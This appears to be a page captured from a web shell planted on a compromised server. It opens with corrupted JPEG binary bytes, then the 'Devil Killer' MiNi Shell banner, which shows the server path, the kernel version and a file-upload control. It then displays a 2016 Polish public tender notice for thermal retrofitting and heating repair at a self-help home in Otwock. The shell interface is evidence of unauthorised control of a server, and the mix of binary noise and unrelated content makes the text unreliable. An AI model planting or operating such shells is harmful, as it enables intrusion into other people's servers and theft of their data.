JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160915/309226-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 309226 - 2016
              z dnia 2016-09-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Otwock: TERMOMODERNIZCJA ORAZ REMONT CENTRALNEGO OGRZEWANIA W BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Środowiskowy Dom Samopomocy, krajowy numer identyfikacyjny
              1585420700000, ul.
              ul. Pułaskiego 
              ,
              05400  
              Otwock, woj.
              mazowieckie, państwo
              , tel.
              0-22 779 34 12, e-mail
              sds.otwock@gmail.com, faks
              0-22 779 34 12.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.bip.powiat-otwocki.pl/98,przetargi-aktualne.html</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>TERMOMODERNIZCJA ORAZ REMONT CENTRALNEGO OGRZEWANIA W BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>CZĘŚĆ nr 1 - TERMOMODERNIZACJA BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU

    Ogólny zakres robót obejmuje:
	demontaż istniejących rur spustowych oraz ponowny ich montaż po wykonaniu warstw izolacji ścian,
	demontaż rynien,
	demontaż drabiny wyłazowej na dach,
	demontaż istniejących obróbek blacharskich,
	demontaż podokienników,
	docieplenie ścian zewnętrznych płytami styropianowymi EPS 033 o grubości 15 cm wraz z wykonaniem tynku cienkowarstwowego silikatowego,
	wykonanie nowej drabiny stalowej,
	malowanie balustrad,
	wymianę ślusarki drzwiowej,
	montaż nowych obróbek blacharskich,
	montaż nowych podokienników,
	ponowny montaż rynien i rur spustowych wraz z montażem koszów zlewowych.
        Szczegółowy zakres prac związanych z termomodernizacją:
a)	Roboty rozbiórkowe.
W związku z remontem elewacji budynku, która przewiduje docieplenie ścian zewnętrznych i zwiększenie grubości ściany o 15 cm, wszystkie obróbki blacharskie i parapety związane z tym nie będą spełniały warunków technicznych i podlegają demontażowi. Istniejące rury spustowe oraz rynny na czas robót należy zdemontować oraz po wykonaniu prac dociepleniowych ponownie zamontować.
Istniejąca ślusarka drzwiowa od strony zachodniej nie spełnia wymogów termicznych, co kwalifikuje ją do demontażu.
Wszelkie drobne elementy wyposażenia budynku uchwyty do flag, tablice informacyjne, numery administracyjne, oprawy oświetleniowe oraz sygnalizację instalacji alarmowej należy zdemontować, oczyścić, pomalować elementy stalowe farbą antykorozyjną i ponownie zamontować po wykonaniu robót remontowych.
b)	Wymiana ślusarki drzwiowej.
W związku z koniecznością demontażu ślusarki drzwiowej projektuje się nową ślusarkę drzwiową z profili aluminiowych wg wykazu. Średni współczynnik przenikania ciepła U=1,3 W/m2K zgodny z wymaganiami dotyczących izolacyjności cieplnej ważnych od dnia 01.01.2021 r.
Drzwi pełne, okucia standardowe, klamki w skrzydłach w środku wysokości, jeden zamek zwykły typu Yale w drzwiach zewnętrznych. Ślusarka drzwiowa w kolorze białym.
Uzupełnienie tynków ościeży wewnętrznych, malowanych farbą emulsyjną.
W trakcie wykonywania robót należy zabezpieczyć posadzkę i elementy wyposażenia pomieszczeń przed uszkodzeniem, oraz sprzątać sukcesywnie stanowiska pracy.
c)	Roboty elewacyjne docieplenie ścian.
Przed przystąpieniem do robót dociepleniowych należy sprawdzić przyczepność istniejącego tynku do podłoża i wszystkie odspojone, uszkodzone, zawilgocone warstwy tynku skuć. Ubytki wypełnić dodatkową warstwą kleju lub zaprawą cementową. Zaprojektowano zgodnie z dostępnością materiałów o odpowiedniej grubości dla danego asortymentu na rynku, następujące grubości warstw dociepleniowych:
	docieplenie ścian styropianem EPS 033 o grubości 15 cm, klasa reakcji na ogień E, deklarowany współczynnik przewodzenia ciepła d0,033 W/mK.
	Docieplenie ścian zewnętrznych budynku przyjęto wykonanie metodą BSO (lekką -mokrą) polegającą na pokryciu powierzchni bezspoinową powłoką składającą się z następujących warstw: warstwa izolacyjna  płyty styropianowe-frezowane,
	warstwa wzmacniająca  wklejona w zaprawę klejącą siatka z włókna szklanego,
	warstwa zewnętrzna  tynk sylikatowy, w części cokołowej tynk żywiczno-mineralny (marmolit).
Kolorystykę elewacji i cokołu należy uzgodnić z Dyrekcją Środowiskowego Domu Samopomocy.
d)	Docieplenie daszków nad wejściami do budynków.
Projektuje się docieplenia daszka od spodu układając płyty styropianowe gr. 5 cm o współczynniku przewodzenia ciepła =0,033 W/m2 oraz tynk cienkowarstwowy. Natomiast od góry należy ułożyć płyty styropianowe laminowane dwustronnie papą gr. 5 cm o współczynniku przewodzenia ciepła =0,033 W/m2.
e)	Montaż nowych obróbek blacharskich i podokienników.
Należy wykonać nowe obróbki blacharskie z blachy stalowej powlekanej w kolorze brąz o minimalnej grubości 0,55 mm. 
Należy również zamontować kosze zlewowe do istniejących rur spustowych.
f)	Malowanie balustrad.
g)	Wykonanie nowej drabinki stalowej.
Projektuje się wykonanie nowej drabiny ze stali ocynkowanej z rur  51x2,3 mm. Drabinę należy wykonać zgodnie z warunkami technicznymi.
h)	Wykonanie instalacji odgromowej.
Zakres wykonania instalacji odgromowej polega na odtworzeniu po wykonanych robotach dekarskich istniejącej instalacji odgromowej. Należy zastosować nowe materiały o tych samych profilach i przekrojach co istniejące.
Po wykonaniu instalacji należy sporządzić protokół z pomiarów rezystancji uziemienia (zgodnie z obowiązującymi normami) i dostarczyć Zamawiającemu

CZĘŚĆ nr 2 - REMONT INSTALACJI CENTRALNEGO OGRZEWANIA W BUDYNKU ŚRODOWISKOWEGO DOMU SAMOPOMOCY W OTWOCKU

Wykonanie remontu instalacji centralnego ogrzewania należy wykonać zgodnie z projektem budowlano-wykonawczym stanowiącym załącznik do SIWZ.
        Ogólny zakres robót obejmuje:
	demontaż istniejących rur centralnego ogrzewania
	demontaż istniejących grzejników
	zmiana charakterystyki pracy istniejącego zestawu pompowo-mieszającego
	montaż zaworów podpionowych oraz grzejnikowych
	montaż nowego orurowania
	montaż nowej izolacji 
	montaż nowych grzejników
	przeprowadzenie próby szczelności
	wykonanie prac naprawczych poinstalacyjnych

        Szczegółowy zakres prac związanych z termomodernizacją.
a)	Instalacja centralnego ogrzewania
Należy wykonać instalację centralnego ogrzewania wodną, dwururową, pompową z rozdziałem dolnym zasilaną z istniejącej kotłowni. Rozprowadzenie instalacji systemem trójnikowym  po trasie demontowanej, istniejącej instalacji. Jako elementy grzejne projektuje się grzejniki.
Miejscem połączenia istniejącej instalacji z projektowaną jest rurociąg stalowy DN40 podłączony do istniejącego rozdzielacza nr 7 (wg schematu kotłowni). Istniejący zestaw pompowo  mieszający będzie wykorzystany dla projektowanej instalacji. Należy dostosować krzywą grzewczą na regulatorze sterującym zaworem trójdrogowym. Istniejąca pompa typu Grundfos UPE 32-60 jest pompą zmiennoobrotową. Należy zmienić jej charakterystykę, tak aby dopasować instalację do warunków projektowych. Parametry pracy pompy podano w raporcie załączonym na końcu projektu.
 
b)	Przewody
Przewody rozdzielcze instalacji centralnego ogrzewania od rozdzielacza w kotłowni wykonać z rur wielowarstwowych Pert-Al-Pehd.
Przewody rozprowadzające należy prowadzić po wierzchu ścian.
Przewody należy prowadzić łagodnymi łukami w celu uzyskania samokompensacji. Prace montażowe wykonywać zgodnie z zaleceniami producentów.
Przewody rozdzielcze w piwnicy o dużych średnicach należy izolować otulinami z pianki poliuretanowej.
c)	Grzejniki
Jako odbiorniki ciepła wykonać grzejniki stalowe a w łazienkach grzejniki drabinkowe zgodnie z projektem. Każde podłączenie grzejnika powinno składać się z zaworu grzejnikowego na zasileniu i zaworu odcinającego na powrocie.
Zdemontowane grzejniki należy pozostawić w miejscu wskazanym przez Zamawiającego.
d)	Armatura
Dobór oraz miejsca umieszczenia armatury został przedstawiony w projekcie budowlano-wykonawczym.
e)	 Próba szczelności
Po wykonaniu instalacji należy sporządzić protokół z próby szczelności instalacji centralnego ogrzewania (ciśnienie robocze próby 4 bary) i dostarczyć Zamawiającemu.

<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45331100-7,
                45215213-3,
                45421100-5,
                45450000-6,
                45312310-3,
                45442100-8,
                45410000-4,
                45443000-4,
                45231110-9,
                45330000-9,
                45320000-6,
                45331000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art.67 ust. 1 pkt. 6 ustawy Pzp. Zamawiający przewiduje udzielenie takich zamówień w przypadku potrzeby wykonania robót tożsamych z przedmiotem zamówienia i zgodnych z jego przedmiotem. Zamawiający przewiduje zamówienia uzupełniające do kwoty nie przewyższającej 50 % wartości zamówienia podstawowego. 	Przewidywany zakres części 1 przedmiotu zamówienia obejmuje roboty elewacyjne oraz remontowe realizowane na terenie inwestycji, których konieczności wykonania nie można było przewidzieć. 
Natomiast zakres części 2 przedmiotu zamówienia obejmuje roboty instalacyjne oraz sanitarne realizowane na terenie inwestycji, których konieczności wykonania nie można było przewidzieć.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 02/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                a)Zamawiający wymaga, aby Wykonawca posiadał Ubezpieczenie od odpowiedzialności cywilnej dla każdej z części w zakresie prowadzonej działalności na kwotę nie niższą niż 100 000 zł (w przypadku realizacji obydwu części 200 000 zł).
b)Zamawiający wymaga, aby Wykonawca posiadał środki na rachunku bankowym lub zdolność kredytową dla każdej części w wysokości nie niższej niż 150 000 złotych. (w przypadku realizacji obydwu części 300 000 zł)
W przypadku złożenia przez Wykonawców dokumentów zawierających dane finansowe w innych walutach niż PLN, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs tej waluty ogłoszony przez NBP i obowiązujący w dniu poprzedzającym dzień wszczęcia postępowania o udzielenie zamówienia.
<br />
                Informacje dodatkowe
                Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
Zamawiający wymaga, aby co najmniej jeden Wykonawca spełnił samodzielnie warunek oraz sytuacji ekonomicznej.
<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 2 zamówienia, obejmujące: 
a) dla części nr 1 przedmiotu zamówienia  termomodernizację o wartości każdej z robót minimum 90 000 zł brutto 
b) dla części nr 2 przedmiotu zamówienia  wykonanie instalacji centralnego ogrzewania o wartości każdej z robót minimum 80 000 zł brutto 

Osoby przewidziane do realizacji zamówienia
a)Realizacja części nr 1 przedmiotu zamówienia - Kierownik budowy winien posiadać uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń.
b)Realizacja części nr 2 przedmiotu zamówienia - Kierownik budowy winien posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych bez ograniczeń.
c)W przypadku realizacji obydwu części przedmiotu zamówienia przez jednego Wykonawcę, jest on zobowiązany do zapewnienia nadzoru nad realizacją przez osoby posiadające odpowiednie uprawnienia.
d)Osoby wskazana w wykazie powinny posiadać uprawnienia wymagane ustawą z dnia 7 lipca 1994 r. Prawo budowlane, do pełnienia samodzielnej funkcji technicznej w budownictwie i przynależeć do właściwej   Izby   Samorządu   Zawodowego   lub   posiadać   kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych (m.in. w ustawie z dnia 18.03.2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej)  oraz posiadać doświadczenie jako Kierownik budowy przy co najmniej dwóch inwestycjach polegających, odpowiednio do przedmiotu zamówienia, na pracach termomodernizacyjnych lub instalacji sanitarnych o wartości robót budowlanych dla każdej z części co najmniej
90 000.00 zł brutto. 
e)Wykonawca przed podpisaniem Umowy zobowiązany będzie do dostarczenia kopii uprawnień potwierdzających kwalifikacje osób wskazanych na stanowiska określone powyżej oraz kopii dokumentów potwierdzających wpis na listę właściwej izby samorządu zawodowego
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
Zamawiający wymaga, aby co najmniej jeden Wykonawca spełnił samodzielnie warunek wiedzy i doświadczenia.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Jednocześnie, w  takiej  sytuacji  Zamawiający  wymaga,  aby Wykonawca przedłożył wraz z wnioskiem dokumenty dotyczące:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy realizacji zamówienia,
c)	charakteru stosunków, jaki będzie łączył wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy realizacji zamówienia.
2.Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy PZP, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
2.Informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
